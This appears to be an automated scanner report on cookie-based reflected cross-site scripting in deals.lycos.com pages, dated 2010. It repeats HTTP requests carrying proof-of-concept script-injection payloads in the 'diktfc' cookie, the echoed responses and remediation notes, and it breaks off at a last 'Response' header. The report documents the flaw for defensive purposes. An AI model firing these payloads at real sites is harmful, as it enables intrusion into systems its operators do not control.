<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/coupons/stores&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A891ef"><script>alert(1)</script>40c20ce42a6&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c07ea"%3balert(1)//565a1b485f was submitted in the diktfc cookie. This input was echoed as c07ea";alert(1)//565a1b485f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /coupons/stores HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac07ea"%3balert(1)//565a1b485f; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:33:33 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:34 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 74602
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa21f"><script>alert(1)</script>c82f0e9250f was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/93-off-iphone-4-cases-at-hhi-extra-20-off-413441 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aaa21f"><script>alert(1)</script>c82f0e9250f; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:33:11 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:12 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17815
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... //b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/93-off-iphone-4-cases-at-hhi-extra-20-off-413441&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aaa21f"><script>alert(1)</script>c82f0e9250f&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd5d1"%3balert(1)//99923b16c8b was submitted in the diktfc cookie. This input was echoed as bd5d1";alert(1)//99923b16c8b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/93-off-iphone-4-cases-at-hhi-extra-20-off-413441 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Abd5d1"%3balert(1)//99923b16c8b; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:33:13 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:13 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17720
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 830f7"%3balert(1)//a3a48905539 was submitted in the diktfc cookie. This input was echoed as 830f7";alert(1)//a3a48905539 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/canon-eos-60d-18mp-dslr-body-899-413793 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A830f7"%3balert(1)//a3a48905539; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:33:28 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:28 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18163
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26ef0"><script>alert(1)</script>8b18dd23c04 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/canon-eos-60d-18mp-dslr-body-899-413793 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A26ef0"><script>alert(1)</script>8b18dd23c04; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:33:27 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:27 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18196
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... rc="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/canon-eos-60d-18mp-dslr-body-899-413793&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A26ef0"><script>alert(1)</script>8b18dd23c04&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8507a"%3balert(1)//42fd6a583c was submitted in the diktfc cookie. This input was echoed as 8507a";alert(1)//42fd6a583c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/casio-ex-fh20-9-1mp-digital-camera-for-200-414612 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A8507a"%3balert(1)//42fd6a583c; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:33:15 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:15 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18680
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a778"><script>alert(1)</script>da4cec6ed03 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/casio-ex-fh20-9-1mp-digital-camera-for-200-414612 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7a778"><script>alert(1)</script>da4cec6ed03; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:33:13 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:14 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18137
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... /b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/casio-ex-fh20-9-1mp-digital-camera-for-200-414612&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7a778"><script>alert(1)</script>da4cec6ed03&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b224"><script>alert(1)</script>91319e796f3 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/cut-the-rope-holiday-gift-for-iphone-for-free-414306 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2b224"><script>alert(1)</script>91319e796f3; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:43 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:43 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17969
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/cut-the-rope-holiday-gift-for-iphone-for-free-414306&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2b224"><script>alert(1)</script>91319e796f3&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82444"%3balert(1)//6b826531f72 was submitted in the diktfc cookie. This input was echoed as 82444";alert(1)//6b826531f72 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/cut-the-rope-holiday-gift-for-iphone-for-free-414306 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A82444"%3balert(1)//6b826531f72; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:45 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:45 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17889
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f1d2"%3balert(1)//3b0a90ac364 was submitted in the diktfc cookie. This input was echoed as 3f1d2";alert(1)//3b0a90ac364 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/dell-core-2-duo-2-9ghz-pc-24-lcd-469-414699 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3f1d2"%3balert(1)//3b0a90ac364; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:31:28 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:28 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17361
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3028"><script>alert(1)</script>900481f7494 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/dell-core-2-duo-2-9ghz-pc-24-lcd-469-414699 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac3028"><script>alert(1)</script>900481f7494; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:31:27 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:27 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17384
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/dell-core-2-duo-2-9ghz-pc-24-lcd-469-414699&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac3028"><script>alert(1)</script>900481f7494&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 298e6"%3balert(1)//fd955e4e72f was submitted in the diktfc cookie. This input was echoed as 298e6";alert(1)//fd955e4e72f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/dell-financial-services-25-off-laptops-more-414325 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A298e6"%3balert(1)//fd955e4e72f; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:31:56 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:56 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18637
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e7bd"><script>alert(1)</script>9753846fcc9 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/dell-financial-services-25-off-laptops-more-414325 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2e7bd"><script>alert(1)</script>9753846fcc9; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:31:55 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:55 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18681
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/dell-financial-services-25-off-laptops-more-414325&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2e7bd"><script>alert(1)</script>9753846fcc9&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f572"><script>alert(1)</script>12d99f9dda4 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/dell-i5-dual-2-53ghz-14-laptop-bundle-900-414537 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2f572"><script>alert(1)</script>12d99f9dda4; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
